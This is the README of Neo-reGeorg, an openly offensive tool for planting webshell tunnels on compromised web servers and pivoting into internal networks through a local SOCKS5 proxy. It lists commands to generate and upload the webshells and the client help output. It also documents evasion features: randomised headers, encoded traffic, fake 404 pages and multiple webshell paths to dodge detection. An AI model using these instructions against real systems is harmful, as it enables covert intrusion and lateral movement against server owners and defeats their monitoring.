Neo-reGeorg is a project designed to actively restructure reGeorg with the aim of:
- Improve tunnel connection security
- Improve usability and avoid feature detection
- Improve the confidentiality of transmission content
- Solve the existing problems of reGeorg and fix some small bugs
2.4.0 - Change Log
- Transfer content through out-of-order base64 encryption
- GET request response can be customized (such as masquerading 404 pages)
- HTTP Headers instructions are randomly generated to avoid feature detection
- HTTP Headers can be customized
- Custom HTTP response code
- Multiple URLs random requests
- Server-node DNS resolution
- Compatible with python2 / python3
- High compatibility of the server environment
- Refer to pivotnacci to implement a single
SESSION
to create multiple TCP connections to deal with some load balancing scenarios - Support HTTP forwarding, coping with load balancing environment
- [requests] - https://github.com/kennethreitz/requests
- Step 1. Set the password to generate tunnel server.(aspx|ashx|jsp|jspx|php) and upload it to the web server.
$ python neoreg.py generate -k password
[+] Create neoreg server files:
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel_compatibility.jspx
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.ashx
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel_compatibility.jsp
- Step 2.
Use
neoreg.py
to connect to the web server and create a socks5 proxy locally.
$ python3 neoreg.py -k password -u http://xx/tunnel.php
+------------------------------------------------------------------------+
Log Level set to [DEBUG]
Starting socks server [127.0.0.1:1080]
Tunnel at:
http://xx/tunnel.php
+------------------------------------------------------------------------+
Note that if your tool, such as nmap
does not support socks5 proxy, please use proxychains
- Support the generated server, by default directly requesting and responding to the specified page content (such as a disguised 404 page)
$ python neoreg.py generate -k <you_password> --file 404.html
$ python neoreg.py -k <you_password> -u <server_url> --skip
- For example, the server WEB needs to set the proxy to access
$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080
- To set
Authorization
, there are also customHeader
orCookie
content.
$ python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"
- Need to disperse requests, upload to multiple paths, such as memory-webshell
$ python neoreg.py -k <you_password> -u <url_1> -u <url_2> -u <url_3> ...
- Turn on http forwarding to cope with load balancing
$ python neoreg.py -k <you_password> -u <url> -r <redirect_url>
- For more information on performance and stability parameters, refer to -h help information
# Generate server-side scripts
$ python neoreg.py generate -h
usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]
Generate neoreg webshell
optional arguments:
-h, --help show this help message and exit
-k KEY, --key KEY Specify connection key.
-o DIR, --outdir DIR Output directory.
-f FILE, --file FILE Camouflage html page file
-c CODE, --httpcode CODE
Specify HTTP response code. When using -r, it is
recommended to <400. (default: 200)
--read-buff Bytes Remote read buffer. (default: 513)
# Connection server
$ python neoreg.py -h
usage: neoreg.py [-h] -u URI [-r URL] -k KEY [-l IP] [-p PORT] [-s] [-H LINE]
[-c LINE] [-x LINE] [--local-dns] [--read-buff Bytes]
[--read-interval MS] [--max-threads N] [-v]
Socks server for Neoreg HTTP(s) tunneller. DEBUG MODE: -k
(debug_all|debug_base64|debug_headers_key|debug_headers_values)
optional arguments:
-h, --help show this help message and exit
-u URI, --url URI The url containing the tunnel script
-r URL, --redirect-url URL
Intranet forwarding the designated server (only
jsp(x))
-k KEY, --key KEY Specify connection key
-l IP, --listen-on IP
The default listening address.(default: 127.0.0.1)
-p PORT, --listen-port PORT
The default listening port.(default: 1080)
-s, --skip Skip usability testing
-H LINE, --header LINE
Pass custom header LINE to server
-c LINE, --cookie LINE
Custom init cookies
-x LINE, --proxy LINE
Proto://host[:port] Use proxy on given port
--local-dns Use local resolution DNS
--read-buff Bytes Local read buffer, max data to be sent per
POST.(default: 2048 max: 2600)
--read-interval MS Read data interval in milliseconds.(default: 100)
--max-threads N Proxy max threads.(default: 1000)
-v Increase verbosity level (use -vv or more for greater
effect)
-
HTTP body steganography
-
Transfer Target field steganography
GPL 3.0